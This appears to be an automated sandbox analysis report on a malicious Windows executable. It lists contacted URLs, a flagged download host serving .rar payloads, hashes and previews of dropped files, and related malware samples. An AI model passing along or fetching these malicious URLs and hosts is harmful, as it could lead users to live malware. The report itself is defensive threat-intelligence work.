        http://ddos.dnsnb8.net:799/cj//k2.rartrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
          high
          http://ddos.dnsnb8.net:799/cj//k2.rarSJdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
            high
            http://www.develop.comSciTE.exe.2.drfalse
              high
              http://www.lua.orgSciTE.exe.2.drfalse
                high
                http://www.rftp.comJosiahSciTE.exe.2.drfalse
                  high
                  http://www.activestate.comSciTE.exe.2.drfalse
                    high
                    http://ddos.dnsnb8.net:799/cj//k1.raruJdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://www.activestate.comHolgerSciTE.exe.2.drfalse
                      high
                      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEJdEV.exe, 00000002.00000002.2597280384.0000000000D13000.00000002.00000001.01000000.00000004.sdmp, JdEV.exe, 00000002.00000003.2071431419.00000000011E0000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        http://www.spaceblue.comSciTE.exe.2.drfalse
                          high
                          http://upx.sf.netAmcache.hve.2.drfalse
                            high
                            http://www.baanboard.comSciTE.exe.2.drfalse
                              high
                              http://www.rftp.comSciTE.exe.2.drfalse
                                high
                                http://ddos.dnsnb8.net:799/cj//k2.rarGpJdEV.exe, 00000002.00000002.2598094406.0000000002B7A000.00000004.00000010.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                http://www.develop.comDeepakSciTE.exe.2.drfalse
                                  high
                                  http://www.baanboard.comBrendonSciTE.exe.2.drfalse
                                    high
                                    https://www.smartsharesystems.com/SciTE.exe.2.drfalse
                                      high
                                      http://www.scintilla.orgSciTE.exe.2.drfalse
                                        high
                                        http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          44.221.84.105
                                          ddos.dnsnb8.netUnited States
                                          14618AMAZON-AESUSfalse
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1585133
                                          Start date and time:2025-01-07 06:07:03 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 26s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name:Run with higher sleep bypass
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:BXOZIGZEUa.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
                                          Detection:MAL
                                          Classification:mal66.spre.troj.evad.winEXE@7/16@1/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 90%
                                          • Number of executed functions: 34
                                          • Number of non-executed functions: 348
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.190.159.64, 13.107.246.45, 172.202.163.200
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          No simulations
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          44.221.84.105PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                          • bumxkqgxu.biz/vnlfrtbjm
                                          ArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                          • ddos.dnsnb8.net:799/cj//k1.rar
                                          aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                          • ddos.dnsnb8.net:799/cj//k1.rar
                                          yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                          • ddos.dnsnb8.net:799/cj//k1.rar
                                          gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                          • ddos.dnsnb8.net:799/cj//k1.rar
                                          REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                          • saytjshyf.biz/xoqfqirqhp
                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                          • npukfztj.biz/edmrjb
                                          http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
                                          • setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                          • saytjshyf.biz/eglmpsrvxnyx
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ddos.dnsnb8.netArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                          • 44.221.84.105
                                          aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                          • 44.221.84.105
                                          yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                          • 44.221.84.105
                                          gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                          • 44.221.84.105
                                          #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                          • 44.221.84.105
                                          #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                          • 44.221.84.105
                                          #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                          • 44.221.84.105
                                          gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                          • 44.221.84.105
                                          ib.exeGet hashmaliciousBdaejecBrowse
                                          • 44.221.84.105
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AMAZON-AESUShttps://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                          • 3.233.158.25
                                          https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253Get hashmaliciousKnowBe4Browse
                                          • 52.55.210.33
                                          x86_64.elfGet hashmaliciousMiraiBrowse
                                          • 54.86.71.160
                                          arm5.elfGet hashmaliciousMiraiBrowse
                                          • 107.22.157.131
                                          spc.elfGet hashmaliciousMiraiBrowse
                                          • 54.136.161.121
                                          sh4.elfGet hashmaliciousMiraiBrowse
                                          • 107.23.89.175
                                          m68k.elfGet hashmaliciousMiraiBrowse
                                          • 34.236.109.145
                                          arm4.elfGet hashmaliciousMiraiBrowse
                                          • 52.90.71.108
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 44.200.217.194
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\JdEV.exeArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                            aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                              yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                                gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                                  #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                    #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                      #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                        gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                                          ib.exeGet hashmaliciousBdaejecBrowse
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):19456
                                                            Entropy (8bit):6.59136493937655
                                                            Encrypted:false
                                                            SSDEEP:384:1FmUScXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:et8QGPL4vzZq2o9W7GsxBbPr
                                                            MD5:138DE96CAE0ECE4D36CCCCFF751E1477
                                                            SHA1:8CE79EF5C3FBE2932BA5CEE7202BAF19133F14D1
                                                            SHA-256:52DA201660D7B4402F0DFD5EC54EAF625DFCEB30E631E46EB5A3988C67552A97
                                                            SHA-512:E0AC3E19202A9D7BDF46F27ADE5CB096FA94080CC0954D283C23E5EE815E5AF9B1DA9C6EE19CCBA15B86B4726A984BFA815081CAE3547C6CAB02B464FC85C3B6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2389504
                                                            Entropy (8bit):6.731345473641953
                                                            Encrypted:false
                                                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                            MD5:2F365839E9C8B28750D07CCB95B8F008
                                                            SHA1:B1454610D0F57E6000B3D7DA61A2224EFBB9E85C
                                                            SHA-256:1B7D0B3B2E03FC422B07F1A86811F9A081668CACB0EB7915F1FC889A7E623E7D
                                                            SHA-512:568D1D520C99628FB7BD7E0E049CD15884FC8BAB1E8F52DA37E6BBD19CC46C61AAED5C22182177B6251C983E542100A5B10A51AE5E20A022B49C550F415CE2C5
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):31744
                                                            Entropy (8bit):6.365985714863891
                                                            Encrypted:false
                                                            SSDEEP:768:uWQ3655Kv1X/qY1MSdtBQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdtmGCq2iW7z
                                                            MD5:CF99C490ECEBC6F3099ED146E75BAD7B
                                                            SHA1:4C00D073CEA301532F5A16660FB623F707EF348A
                                                            SHA-256:A39E02A55C414CA2A62C79BA1C98C6D6DC4565829F814EE539F2245FBBCD389F
                                                            SHA-512:7D30B77876722CFBEB08D36E6DA98258C881C255BB043B38135F6923320702E477903FF0CD266762F105D546D2A12A4098957572ABBBAD4B2B4E858945662329
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.9841334238155683
                                                            Encrypted:false
                                                            SSDEEP:192:rKvwxvN6UI0fyRmgSv3j0/J9zuiFckZ24IO8eOB6:riwxvN6Ujf8mRv3jAzuiFckY4IO8eOB
                                                            MD5:4368566DFAE0E3B90D5545AC2D87F299
                                                            SHA1:270E2D6B16E443A25D4D8E911DC1F4F035CBC4DF
                                                            SHA-256:03008AA5CFEFD619F1902A0078D6C747FE5376F4162C808AC66D12D844BC3819
                                                            SHA-512:1946044DA8849E45CAC95D12040A21CAAF929A1AC366E89C4A489296CD261073FBD34E460D405DD112D7469453677118E03640ACB1F24BC7812480E8F5AA6BF1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.7.0.0.0.8.3.4.7.4.4.5.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.7.0.0.0.8.4.0.9.9.4.5.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.4.6.5.c.c.f.-.9.f.0.d.-.4.4.9.0.-.9.3.d.f.-.6.e.7.a.d.4.5.4.6.3.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.8.7.e.7.5.8.-.3.5.d.d.-.4.5.1.3.-.a.7.e.d.-.8.9.f.0.c.2.9.c.7.5.8.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.J.d.E.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.c.4.-.0.0.0.1.-.0.0.1.4.-.0.f.f.a.-.3.6.1.d.c.2.6.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.4.d.b.6.7.8.b.c.8.d.1.6.8.1.4.c.0.e.8.0.0.3.e.d.4.1.4.d.c.2.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.J.d.E.V...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Tue Jan 7 05:08:03 2025, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):160940
                                                            Entropy (8bit):1.8609507336429265
                                                            Encrypted:false
                                                            SSDEEP:384:QH+EYiFNdD7gx9HAb7GUqpDGKiVuGppZLuNeBGzkzWoprbIn:QH+EP6x9HAXGjDG+ALuFoc
                                                            MD5:A0A146F2A4FDBA14C0C193918E076757
                                                            SHA1:474C9CE26319DEA66859F2A629D427DE51CD7F9D
                                                            SHA-256:088B495515746B166078A3C8CB5E43E94C82BEC8E4F260F1B1FD1DA623EFA869
                                                            SHA-512:741306A252611B6969F0C8571787D23AA12D1A5BF1E3DA5EF25F3C99AE8371746973C67DC2897C6B91062187217617590F20BC2A95C3DE77CD0B372A8357E225
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MDMP..a..... .........|g............t.......................<...,!......D....Q..........`.......8...........T...........@>..l6..........h!..........T#..............................................................................eJ.......#......GenuineIntel............T.............|g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):6256
                                                            Entropy (8bit):3.719234995987262
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJRCv6+BqeYwwWuqdpDH89bH8sfONm:R6lXJRK6+VYwwWaHPfV
                                                            MD5:425D1D7CDF809E2FE7CCBFA91D487754
                                                            SHA1:784C943F63798BCEE7C6463B1C2DD1C3855B7B37
                                                            SHA-256:E7C3480CEF95833F08FAF41E115FB67A5D1AFAE9B4F4166F404D25390E120AC7
                                                            SHA-512:4A178DE691E52C9AA4452CFF3844BC893CBAF5F077D9F53D3B3382E48917ACFB26D1C83DAD0CAB327F71078C7E3A5F86A0D35564EFD160236BC365458C1F1FC7
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.2.4.<./.P.i.
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4537
                                                            Entropy (8bit):4.436549818226328
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsPeJg77aI97QWpW8VYcYm8M4JwGFc+q8m5U0zgqAd:uIjfPUI7pp7VUJGxU0zgqAd
                                                            MD5:F806D7108BB33726E6B799A47809C6CE
                                                            SHA1:31BF1FB7156F65BE74AB4BBC7AC6268776AC42BC
                                                            SHA-256:E9C3580394B73B4F7F36EF6C4486CC42C7B1A32CBD6E2498625B0090C91B9F1D
                                                            SHA-512:F22C8BE96AD1D7C6DD828A2A676C6E83F6970C6B12211B43207A4B8A047E562E13BB895BCC73F83104567B859AAEC0772F513F064C608075CC3D28089FD42333
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665050" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):1.5
                                                            Encrypted:false
                                                            SSDEEP:3:Nv:9
                                                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                            Malicious:false
                                                            Preview:foo.
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):1.5
                                                            Encrypted:false
                                                            SSDEEP:3:Nv:9
                                                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                            Malicious:false
                                                            Preview:foo.
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):1.5
                                                            Encrypted:false
                                                            SSDEEP:3:Nv:9
                                                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                            Malicious:false
                                                            Preview:foo.
                                                            Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                            File Type:ASCII text
                                                            Category:modified
                                                            Size (bytes):4
                                                            Entropy (8bit):1.5
                                                            Encrypted:false
                                                            SSDEEP:3:Nv:9
                                                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                            Malicious:false
                                                            Preview:foo.
                                                            Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):15872
                                                            Entropy (8bit):7.031113762428177
                                                            Encrypted:false
                                                            SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                                            MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                            SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                                            SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                                            SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 97%
                                                            Joe Sandbox View:
                                                            • Filename: ArjM1qx3hV.exe, Detection: malicious, Browse
                                                            • Filename: aRxo3E278B.exe, Detection: malicious, Browse
                                                            • Filename: yRc7UfFif9.exe, Detection: malicious, Browse
                                                            • Filename: gT6IitwToH.exe, Detection: malicious, Browse
                                                            • Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse
                                                            • Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse
                                                            • Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse
                                                            • Filename: gE4NVCZDRk.exe, Detection: malicious, Browse
                                                            • Filename: ib.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
                                                            File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x1158 "Signature", at 0x68 WinDirPath, LanguageID 809
                                                            Category:dropped
                                                            Size (bytes):5884
                                                            Entropy (8bit):3.2100538689449323
                                                            Encrypted:false
                                                            SSDEEP:96:16T0jnDWLlB9Su3H75DjLocg8IwJR56mXkR/1fszenFWhH:sCyZSuXVDjLor8IwJRMm0wzOEp
                                                            MD5:5F167C05E471EB855F876E5F670AA73C
                                                            SHA1:88BE1D17384EE549AAE791F326C35F60D194C1A6
                                                            SHA-256:4FAF06C683C2F6680B0B3F73C6A99E3FD84014CC2BD3DB6863F56F288F3FD13F
                                                            SHA-512:CF8CCDCCBF16BF10B91B0DE0076369CA3985EDB1976616F57C82783685AC890C8FA5A388AC2066163B6B9119BA9C0DE4FE6ED39161DF0B3DF06C2555AC9F8076
                                                            Malicious:false
                                                            Preview:................H...X....d..................................h...,.......0.......h.......................C.:.\.W.i.n.d.o.w.s.........................................................................................................\...................................................................|.......................|...........................................................................................................................................................................`.......H.......................................................................L...................................................................................................................@...........................................................................................................................................................h.......................t...................................................................................................................................
                                                            Process:C:\Users\user\Desktop\BXOZIGZEUa.exe
